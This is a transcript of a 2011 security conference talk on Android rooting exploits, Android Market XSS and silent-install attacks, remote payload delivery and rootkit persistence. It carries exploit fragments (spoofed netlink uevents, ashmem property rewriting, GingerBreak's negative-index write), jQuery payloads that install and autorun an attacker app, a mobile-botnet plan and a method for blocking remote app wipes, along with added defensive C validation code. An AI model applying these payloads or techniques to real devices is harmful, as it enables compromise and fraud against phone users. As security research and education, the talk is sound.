bsides11-dontrootrobots

Date post: 21-Feb-2018
Upload: itsv4v

Transcript
• 7/24/2019 bsides11-dontrootrobots

Slide # 1: DON'T ROOT ROBOTS! - BSides Detroit 2011

Slide # 2: A TEAM JOCH Production

Jon Oberheide + Zach Lanier = TEAM JOCH

Slide # 3: DON'T DATE ROBOTS!

Slide # 4: Agenda

- Overview
- Escalation
- Delivery
- Persistence

Slide # 5: I'm A Human!

What's in an Android?

Slide # 6: Android at a Glance

Base platform: ARM core
- Linux 2.6.3x kernel

Native libraries
- libc, WebKit, etc.

Dalvik VM
- Register-based VM
- Runs dex bytecode

Applications
- Developed in Java
- Run on Dalvik VM
- Linux process 1:1

Slide # 7: Permission-Based Model

Apps explicitly request predefined permissions.

Examples:
- Cellular: calls, SMS, MMS
- Network, Bluetooth, WiFi
- Hardware: vibrate, backlight
- Location: coarse, fine
- App data: contacts, calendars

Slide # 8: App Sandboxing

"Sandboxed" by standard *NIX uid/gid
- Generated unique per app at install time

High-level permissions restricted by Android runtime framework

Slide # 9: App Distribution

Application signing
- Self-signed by developers

Android Market
- $25 signup, anyone can publish
- Anonymous signup is possible

Slide # 10: Agenda (Escalation)

- Overview
- Escalation
- Delivery
- Persistence

Slide # 11: DON'T ROOT ROBOTS!

Why root your Android?

Slide # 12: Android Jailbreaks

Jailbreaks can be "GOOD"
- KillingInTheNameOf
- ZimperLich
- GingerBreak

LET'S DIVE IN!

Slide # 14: Exploid Jailbreak

EXPLOID

Slide # 15: CVE-2009-1185

Reduce, reuse, recycle...exploits!

Won 2009 Pwnie Award for best privesc!

Slide # 16: Netlink in ASCII

       +---------------------+      +---------------------+
       | (3) application "A" |      | (3) application "B" |
       +------+--------------+      +--------------+------+
              |                                    |
              \                                   /
               \                                 /
                |                               |
        +-------+--------------------------------+-------+
        |        :                               :       |   user-space
    =====+       :     (5)  kernel socket API    :       +================
        |        :                               :       |   kernel-space
        +--------+-------------------------------+-------+
                 |                               |
           +-----+-------------------------------+----+
           |        (1)  Netlink subsystem            |
           +---------------------+--------------------+
                                 |
           +---------------------+--------------------+
           |       (2) Generic Netlink bus            |
           +--+--------------------------+-------+----+
              |                          |       |
      +-------+---------+                |       |
      |  (4) controller |               /         \
      +-----------------+              /           \
                                       |             |
                    +------------------+--+     +--+------------------+
                    | (3) kernel user "X" |     | (3) kernel user "Y" |
                    +---------------------+     +---------------------+

Slide # 17: Let's Pretend...

(The Netlink diagram from slide 16 again, annotated with a kernel OBJECT emitting a UEVENT to UDEV.)

Kernel notifies udev of kobject event via netlink interface.
udev performs some privileged action.

Slide # 18: Lack of Source Checking

(The same Netlink diagram, now with an EVIL APP in place of the kernel object.)

Evil app sends udev an evil message via netlink interface.
udev performs evil privileged action.

Slide # 19: Exploid Jailbreak

Android "inherited" the udev vuln
- "init" daemon encapsulated udev functionality
- Still was present years after udev patch

My non-Android udev exploit just ran /tmp/run as root:

    mp = message;
    mp += sprintf(mp, "remove@/d") + 1;
    mp += sprintf(mp, "SUBSYSTEM=block") + 1;
    mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
    mp += sprintf(mp, "TIMEOUT=10") + 1;
    mp += sprintf(mp, "ACTION=remove") + 1;
    mp += sprintf(mp, "REMOVE_CMD=/tmp/run") + 1;

Slide # 20: Exploid Payload

Stealth's payload looked like the following:

    close(creat("loading", 0666));
    if ((ofd = creat("hotplug", 0644)) < 0)
        die("[-] creat");
    if (write(ofd, path, strlen(path)) < 0)
        die("[-] write");
    close(ofd);
    symlink("/proc/sys/kernel/hotplug", "data");
    snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"
             "SUBSYSTEM=firmware%c"
             "FIRMWARE=../../..%s/hotplug%c",
             0, basedir, 0, 0, basedir, 0);

What's happening here?
- creates "loading" file
- writes "hotplug" file (its content is the path to the exploid binary)
- symlinks "data"
- builds the netlink msg

Slide # 21: Use the Source, Luke!

From http://android.git.kernel.org/?p=platform/system/core.git;a=blob;f=init/devices.c :

    void process_firmware_event(struct uevent *uevent)
    {
        ...
        l = asprintf(&root, SYSFS_PREFIX"%s/", uevent->path);
        l = asprintf(&loading, "%sloading", root);
        l = asprintf(&data, "%sdata", root);
        l = asprintf(&file1, FIRMWARE_DIR1"/%s", uevent->firmware);
        ...
        loading_fd = open(loading, O_WRONLY);
        data_fd = open(data, O_WRONLY);
        fw_fd = open(file1, O_RDONLY);
        ...
        if(!load_firmware(fw_fd, loading_fd, data_fd))

Resulting paths:
- /sys/../sqlite_stmt_journals/loading
- /etc/firmware/../../sqlite_stmt_journals/hotplug
- /sys/../sqlite_stmt_journals/data

Slide # 22: Use the Source, Luke!

From http://android.git.kernel.org/?p=platform/system/core.git;a=blob;f=init/devices.c :

    int load_firmware(int fw_fd, int loading_fd, int data_fd)
    {
        ...
        write(loading_fd, "1", 1); /* start transfer */
        while (len_to_copy > 0) {
            nr = read(fw_fd, buf, sizeof(buf));     /* read from "hotplug" */
            ...
            while (nr > 0) {
                nw = write(data_fd, buf + nw, nr);  /* write to "data" */
        ...
    }

Netlink message causes the init daemon to read the contents of "hotplug" and write them into "data".
Slide # 23: BOOM! ROOT!

Remember:
- "hotplug" contains path to exploid
- "data" is symlinked to /proc/sys/kernel/hotplug

So:
- /proc/sys/kernel/hotplug now contains the path to the exploid binary
- Overrides the default hotplug path

Invoke hotplug:
- Exploid will be run as root!

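The source check that udev, Android's init and (later) vold all lacked, as an added example: this is not code from the talk or from Android, although Android's eventual fix applied the same two conditions. A NETLINK_KOBJECT_UEVENT receiver discards any message whose sender address or SCM_CREDENTIALS do not identify the kernel. The demo_accept() helper and the socket setup assumed in the comments are illustrations, not part of any daemon.

```c
#define _GNU_SOURCE
#include <linux/netlink.h>
#include <stdbool.h>
#include <stddef.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>

#ifndef SCM_CREDENTIALS
#define SCM_CREDENTIALS 0x02
#endif
/* Same layout as struct ucred (pid, uid, gid); declared locally so the example
 * does not depend on feature-macro ordering. */
struct peer_cred { pid_t pid; uid_t uid; gid_t gid; };

/* Accept a uevent only when it came from the kernel:
 *  - nl_pid must be 0: the kernel sends with port id 0, while any process that
 *    binds a uevent socket gets a non-zero port id;
 *  - nl_groups must be non-zero: kernel uevents are multicast (group 1), a
 *    unicast message (groups == 0) was addressed to us by a process;
 *  - SCM_CREDENTIALS uid must be 0: an app cannot forge root credentials. */
bool uevent_sender_is_kernel(const struct sockaddr_nl *from, socklen_t fromlen,
                             const struct peer_cred *cred)
{
    if (from == NULL || fromlen < sizeof(*from) || from->nl_family != AF_NETLINK)
        return false;
    if (from->nl_pid != 0)              /* sent by a user process, not the kernel */
        return false;
    if (from->nl_groups == 0)           /* unicast: not a kernel multicast uevent */
        return false;
    if (cred == NULL || cred->uid != 0) /* missing or non-root credentials */
        return false;
    return true;
}

/* Locate SCM_CREDENTIALS in the ancillary data of a received message. */
const struct peer_cred *uevent_peer_cred(struct msghdr *msg)
{
    for (struct cmsghdr *c = CMSG_FIRSTHDR(msg); c != NULL; c = CMSG_NXTHDR(msg, c))
        if (c->cmsg_level == SOL_SOCKET && c->cmsg_type == SCM_CREDENTIALS)
            return (const struct peer_cred *)CMSG_DATA(c);
    return NULL;
}

/* Receive one uevent into buf; returns the payload length, or -1 on error or
 * when the sender check fails. Assumes fd is a
 * socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT) bound with nl_groups=1
 * and with SO_PASSCRED enabled so credentials arrive with every message. */
ssize_t uevent_recv_checked(int fd, char *buf, size_t buflen)
{
    struct sockaddr_nl from;
    char ctl[CMSG_SPACE(sizeof(struct peer_cred))];
    struct iovec iov = { .iov_base = buf, .iov_len = buflen };
    struct msghdr msg = {
        .msg_name = &from, .msg_namelen = sizeof(from),
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = ctl, .msg_controllen = sizeof(ctl),
    };
    ssize_t n = recvmsg(fd, &msg, 0);
    if (n < 0)
        return -1;
    if (!uevent_sender_is_kernel(&from, msg.msg_namelen, uevent_peer_cred(&msg)))
        return -1;                      /* spoofed or unprivileged sender: drop it */
    return n;
}

/* Demo helper (assumption, not part of any daemon): builds the sender address
 * and credentials for one scenario so the check runs without a socket. */
bool demo_accept(unsigned pid, unsigned groups, bool with_cred, unsigned uid)
{
    struct sockaddr_nl from = { .nl_family = AF_NETLINK, .nl_pid = pid, .nl_groups = groups };
    struct peer_cred cred = { .pid = 1, .uid = uid, .gid = uid };
    return uevent_sender_is_kernel(&from, sizeof(from), with_cred ? &cred : NULL);
}
```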
Slide # 24: RageAgainstTheCage Jailbreak

RAGEAGAINSTTHECAGE

Slide # 25: Quick Trivia

What's wrong with the following code?
Assuming a uid/euid=0 process dropping privileges:

    /* Code intended to run with elevated privileges */
    do_stuff_as_privileged();

    /* Drop privileges to unprivileged user */
    setuid(uid);

    /* Code intended to run with lower privileges */
    do_stuff_as_unprivileged();

Slide # 26: Setuid Quirks

    /* Drop privileges to unprivileged user */
    setuid(uid);

From setuid(2) man page:

    ERRORS
        EAGAIN  The uid does not match the current uid and uid brings process
                over its RLIMIT_NPROC resource limit.

Well, there's really only one line of interest: it's true, setuid() can and will fail.

Slide # 27: Linux Resource Limits

What is RLIMIT_NPROC?

    RLIMIT_NPROC  The maximum number of processes (or, more precisely on Linux,
                  threads) that can be created for the real user ID of the calling
                  process. Upon encountering this limit, fork(2) fails with the
                  error EAGAIN.

If there are too many processes for the uid we're dropping to, setuid() will fail!
Therefore, privileges will not be dropped and we'll continue execution with uid=0!

Slide # 28: Exploiting setuid(2) Issues

If we can artificially inflate the number of processes owned by the target uid, we can hit the uid's RLIMIT_NPROC and force setuid() to fail with errno EAGAIN.

Hopefully, the binary running with uid=0 will then perform some unsafe operation that we can influence.

Slide # 29: Android Debug Bridge

ADB: "Android Debug Bridge (adb) is a versatile command line tool that lets you communicate with an emulator instance or connected Android-powered device. It is a client-server program that includes three components:
- A daemon, which runs as a background process on each emulator or device instance."

Guess what ADB fails to do when it calls setuid to drop privileges?

Slide # 30: RageAgainstTheCage Exploit

ADB fails to check setuid() return value:

    /* then switch user and group to "shell" */
    setgid(AID_SHELL);
    setuid(AID_SHELL);

RageAgainstTheCage exploit:
- fork() up to RLIMIT_NPROC for "shell" user
- Kill adb, fork() again, adb fails setuid()
- Your adb shell is now a root shell!

Slide # 31: KillingInTheNameOf Jailbreak

KILLINGINTHENAMEOF

Slide # 32: Android's ashmem

ashmem
- Custom shmem interface by Google:

"The ashmem subsystem is a new shared memory allocator, similar to POSIX SHM but with different behavior and sporting a simpler file-based API."

Custom code = ripe for vulnerabilities!

Slide # 33: ashmem Property Mapping

ashmem maps the Android system properties in to each address space.

Not mmaped PROT_WRITE thankfully; that would be bad, wouldn't it?

    # cat /proc/178/maps
    ...
    40000000-40008000 r-xs 00000000 00:07 187  /dev/ashmem/system_properties (deleted)
    ...

Slide # 34: Android Properties

Android properties:

    $ getprop
    [ro.secure]: [1]
    [ro.allow.mock.location]: [1]
    [ro.debuggable]: [1]
    ...

ro.secure determines whether ADB runs as root or drops privs to the AID_SHELL user.
If we can change it to 0, we've got root!

Slide # 35: KillingInTheNameOf Exploit

Turns out ashmem will let us mprotect the mapping as PROT_WRITE:

    printf("[+] Found prop area @ %p\n", prop);
    if (mprotect(prop, PA_SIZE, PROT_READ|PROT_WRITE) < 0)
        die("[-] mprotect");

Flip the ro.secure property to 0:

    if (strcmp(pi->name, "ro.secure") == 0) {
        strcpy(pi->value, "0");

Spawn root adb shell!

Slide # 36: Zimperlich Jailbreak

ZIMPERLICH

Slide # 37: Zimperlich Jailbreak

GUESS WHAT?

Same as RageAgainstTheCage, except for the zygote process!
Missing return value check on setuid(2).

Slide # 38: GingerBreak Jailbreak

GINGERBREAK

Slide # 39: GingerBreak Jailbreak

GUESS WHAT AGAIN?

Same as Exploid, except for the vold process!
Missing source check on netlink message.

Slide # 40: GingerBreak Vulnerability

Spot the vuln in vold's DirectVolume.cpp!

    void DirectVolume::handlePartitionAdded(const char *devpath, NetlinkEvent *evt)
    {
        int major = atoi(evt->findParam("MAJOR"));
        int minor = atoi(evt->findParam("MINOR"));
        ...
        int part_num;
        const char *tmp = evt->findParam("PARTN");
        ...
        part_num = atoi(tmp);
        ...
        if (part_num > mDiskNumParts) {
            mDiskNumParts = part_num;
        }
        mPartMinors[part_num -1] = minor;

Slide # 41: Arbitrary Write Vulnerability

Arbitrary write via negative index
- Spoof netlink msg with maliciously crafted PARTN and MINOR

    n = snprintf(buf, sizeof(buf), "@/foo%cACTION=add%c"
                 "SUBSYSTEM=block%c"
                 "DEVPATH=%s%c"
                 "MAJOR=179%cMINOR=%d%c"
                 "DEVTYPE=harder%cPARTN=%d",
                 0, 0, 0, bsh, 0, 0, vold.system, 0, 0, -idx);

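The index validation that vold's handlePartitionAdded() lacked, as an added example rather than vold's or the talk's code: it walks the NUL-separated key=value uevent layout the snprintf() above builds, requires PARTN to be a whole decimal in 1..MAX_PARTS and MINOR in 0..255, and only then stores the minor. MAX_PARTS, the demo_partition_event() helper and its sample event are constructed assumptions.

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_PARTS 32   /* assumed size of the per-disk minor table */

/* strnlen equivalent, kept local so no feature macro is needed. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t i = 0;
    while (i < max && s[i] != '\0') i++;
    return i;
}

/* Find "key=" in a uevent payload (NUL-separated strings, the first being the
 * "action@devpath" header); returns a pointer to the value or NULL. */
const char *uevent_find_param(const char *buf, size_t len, const char *key)
{
    size_t klen = strlen(key);
    size_t off = bounded_len(buf, len) + 1;      /* skip the header string */
    while (off < len) {
        const char *s = buf + off;
        size_t slen = bounded_len(s, len - off);
        if (slen > klen && strncmp(s, key, klen) == 0 && s[klen] == '=')
            return s + klen + 1;
        off += slen + 1;
    }
    return NULL;
}

/* Strict replacement for atoi(): the whole string must be a decimal integer and
 * lie within [lo, hi]. atoi() silently accepts "-7", "99999" and "2x". */
bool parse_int_in_range(const char *s, long lo, long hi, long *out)
{
    if (s == NULL || *s == '\0')
        return false;
    char *end;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (errno != 0 || *end != '\0' || v < lo || v > hi)
        return false;
    *out = v;
    return true;
}

/* Hardened form of the index handling: PARTN is used as an index only after it
 * is known to be in 1..nparts, so a spoofed negative PARTN cannot write outside
 * minors[]. Returns 0 on success, -1 when the event is rejected (nothing written). */
int handle_partition_added(const char *buf, size_t len, int *minors, size_t nparts)
{
    long part_num, minor;
    if (!parse_int_in_range(uevent_find_param(buf, len, "PARTN"), 1, (long)nparts, &part_num))
        return -1;
    if (!parse_int_in_range(uevent_find_param(buf, len, "MINOR"), 0, 255, &minor))
        return -1;
    minors[part_num - 1] = (int)minor;
    return 0;
}

/* Demo (assumption): builds a block uevent in the same NUL-separated layout as
 * the slide's snprintf() and feeds it through the hardened handler. Returns the
 * minor stored for that partition, or -1 if the event was rejected. */
int demo_partition_event(const char *partn)
{
    char buf[256];
    int minors[MAX_PARTS] = { 0 };
    int n = snprintf(buf, sizeof(buf), "add@/devices/foo%cACTION=add%cSUBSYSTEM=block%c"
                     "MAJOR=179%cMINOR=5%cPARTN=%s", 0, 0, 0, 0, 0, partn);
    if (n < 0 || handle_partition_added(buf, (size_t)n, minors, MAX_PARTS) < 0)
        return -1;
    return minors[strtol(partn, NULL, 10) - 1];
}

int main(void)
{
    printf("PARTN=3  -> minor %d stored\n", demo_partition_event("3"));
    printf("PARTN=-7 -> %d (rejected)\n", demo_partition_event("-7"));
    return 0;
}
```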
Slide # 42: GingerBreak NX Bypass

But where/what to write?

Some Android devices have NX stack/heap
- But lack other hardening mechanisms: GCC's RELRO
- gcc -Wl,-z,relro,-z,now
- Maps GOT as read-only

If no RELRO:
- Clobber GOT entry to modify control flow

Slide # 43: GingerBreak Exploit

Not quite so simple though:
- Discover GOT, system(), etc. addresses
- Clobber GOT for functions (atoi, etc.) = system()
- Funcs called on attacker-controlled data:
- atoi=system and tmp="/data/local/tmp/boomsh"

Impact?
- Pretty catastrophic

JavaScript XSS payload can trigger the install of any app to your phone.

Slide # 52: XSS Install Payload

Install payload:

    /* silently install malicious app to victim phone */
    $.post('/install', {
        id: 'com.attacker.maliciousapp',
        device: initProps['selectedDeviceId'],
        token: initProps['token'],
        xhr: '1'
    }, function(data) {});

Forces user's browser to request install of com.attacker.maliciousapp.

Slide # 53: XSS Trigger Payload

Trigger payload:

    /* append hidden iframe (the iframe markup was stripped from the transcript;
       the element is the one selected by '#xss' below) */
    $('body').append($('<iframe id="xss" style="display:none"></iframe>'));

    /* continually trigger iframe src */
    function trigger() {
        $('#xss').attr('src', 'trigger://blah');
        setTimeout('trigger()', 1000);
    }
    setTimeout('trigger()', 1000);

Forces user's phone to "autorun" the malicious app after install.

Slide # 54: Web Market Lessons

XSS / RCE
- Rarely used in the same sentence!

Cross-device vulnerabilities
- Don't cross the streams...at least without a simple confirmation prompt! :o

Fixed the XSS but not the underlying issue
- Just wait a few months for the next XSS

Slide # 55: Angry Birds Attack

ANGRY BIRDS ATTACK

Slide # 56: Perceived App Install Process

1. Browse  2. Install  3. Approve  BOOM!

Slide # 57: Actual App Install Process

1. User clicks install/approve
2. Market app POSTs install request to Google
3. Market servers signal C2DM servers
4. C2DM servers push down INSTALL_ASSET
5. GTalkService receives INSTALL_ASSET and invokes vending
6. Vending component fetches APK and installs

Slide # 58: Market Interactions

Google is a sneaky panda!
- You don't actually download / install the app through the market application

When you click install in the market app
- Google servers push an out-of-band message down to you via persistent data connection
- Triggers INSTALL_ASSET intent to start install
- Intent handler fetches APK and installs

Slide # 59: Dex Bytecode RE

(screenshot only)

Slide # 60: GTalkService Connection

Persistent data connection
- Speaks XMPP
- Same connection now used for C2DM push service

Gap in responsibility
- Market app approves perms
- But GTalkService triggers install
- There's a disconnect here

Slide # 61: Market App Requests

What does the market app POST to the market server?

Can we spoof the same request and trigger an INSTALL_ASSET message and subsequent install?

Slide # 62: Base64 Encoded Protobuf

(screenshot only)

Slide # 63: Raw Protobuf Decoded

(screenshot only)

Slide # 64: RE'ed Protobuf Specification

- app/asset ID
- auth token
- install request message

Slide # 65: Elements of an Install Request

We have the format of the request now!

Need to populate it with:
- Lots of miscellaneous fields
- App ID: target app to be installed. Can be derived from dissecting market requests.
- Auth token: the hard part? Turns out we can steal it from Android's AccountManager!

Slide # 66: Bypassing Permissions Approval

Steal the "android" service token used by market from the AccountManager.

Construct protobuf request to market servers for invoking an application install.

INSTALL_ASSET is pushed and app installed without any user prompt / permission approval.

PoC disguised as an Angry Birds expansion app.

Slide # 67: Angry Birds Bonus Levels

(screenshot only)

Slide # 68: Fake Toll Fraud App

(screenshot only)

Slide # 69: RootStrap

ROOTSTRAP

Slide # 70: Android Native Code

Dalvik VM != sandbox
- Not limited to executing dex bytecode
- Can pop out of the VM to execute native code

Native code packaged within APKs
- Android should do some code signing like iPhone
- But it doesn't, so why limit execution of native code to build-time packaged modules?

Slide # 71: RootStrap

How to deliver payloads most effectively?

Enter, RootStrap
- Silent runtime fetching and execution of remote ARM payloads

Slide # 72: Native ARM Code Delivery

Fetch index file
- Lists available exploits and module names

Yank down ARM modules
- Dumped to Android app private storage
- e.g. /data/data/org.rootstrap/files, not /libs

Load via JNI and execute each payload
- System.load("/files/root1.so")

Slide # 73: How to Build a Mobile Botnet

Build some fun legit-looking games / apps
- Include RootStrap functionality
- Periodically phone home to check for new payloads

As soon as a new vuln/jailbreak is published, push down payload to RootStrapped phones
- Before providers push out OTA patch
- Trivial to win that race, slow OTA updates

Rootkit a bunch of phones!

Slide # 74: A Wolf in Vampire's Clothing?

RootStrap app is boring and not sneaky
- No one would intentionally download it
- Need something legit looking to get a large install base

Hmm...what to do, what to do

Slide # 75: Fake Twilight Eclipse App

(screenshot only)

Slide # 76: Andy and Jaime Don't Like It :(

Still, 200+ downloads in under 24 hours.

With a legit-looking app/game, you could collect quite an install base for RootStrap.

Slide # 77: Agenda (Persistence)

- Overview
- Escalation
- Delivery
- Persistence

Slide # 78: Persistence

Hands off our rootkit!

Slide # 79: Staying on the Device

Google will wipe "bad" apps
- My RootStrap app, as a dry-run
- DroidDream malware, for real

Bad guys want to stay on the device
- Maintain C&C, deliver new payloads, etc.

"Surprisingly enough, I've yet to see any Android malware perform any post-rooting self-protection."

Slide # 80: REMOVE_ASSET Patching

REMOVE_ASSET
- Allows Google to remote wipe apps
- Easy to patch out the dex code if you're root

Vending.apk
- com.android.vending
- RemoveAssetReceiver class
- Patch in a 0x0e00 / return-void instruction at beginning of onReceive()

Slide # 81: Questions?

Slide # 82: Jon Oberheide

@jonoberheide
jon@oberheide.org
Duo Security